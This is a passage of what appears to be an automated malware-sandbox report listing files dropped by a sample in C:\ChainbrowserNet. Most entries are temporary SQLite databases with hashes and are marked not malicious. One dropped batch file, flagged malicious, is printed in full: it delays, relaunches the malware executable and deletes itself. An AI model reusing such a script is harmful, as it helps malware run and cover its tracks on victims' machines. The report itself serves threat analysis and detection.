                                                                                          C:\Users\user\AppData\Local\Temp\CnFTy13wIo

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\D13xjV0vdk

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\DP8XQcclJc

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\DZJbKmvRJw

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\E6gHH0q0OS

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\EOVJY4Ltdm

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\EVVBo9NfLq

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\EZHx84UQ8r

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\FD1H4vWtQ9

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\FZal7ZLmE4

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\Ff39zMQKS5.bat

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):217
                                                                                          Entropy (8bit):5.200067388699201
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:hCijTg3Nou1SV+DEoDH0lHFKOZG1wkn23ft3n:HTg9uYDEGwH1fFn
                                                                                          MD5:E7E0DE7616F5FCAB418E5226757A8839
                                                                                          SHA1:E6D8644F49785F1A4BF58554F75BF4184D6C61F7
                                                                                          SHA-256:EA87C43CF7DEEAC8A90D18C97112880361F797B61EA59EA77884945CC45F638E
                                                                                          SHA-512:B4FB42A5DEECEB877257BD9A7B253FFD3FF151ADEBF61EBDB9BE6763AE609E09C47B76E0FF39BC5FB9604496412FDB584CB2C159E59C15C2B3FCB1735759685E
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\ChainbrowserNet\backgroundTaskHost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\Ff39zMQKS5.bat"

                                                                                          C:\Users\user\AppData\Local\Temp\FlZ1Vxpdjo

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\G8BGzIbXwr

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\GHh4wLHCob

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\GsqoHaavpe

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\GzPQRP4Q4g

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\H0GhPunaUG

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\HXbp7JuaA2

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\HYrXTo1Uo1

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\HjQzEdDACv

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\IBmZyEMkAY

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\IOSgx2qbhO

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\IPrqC9j8LE

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\IZLy0LadZR

                                                                                          Download File
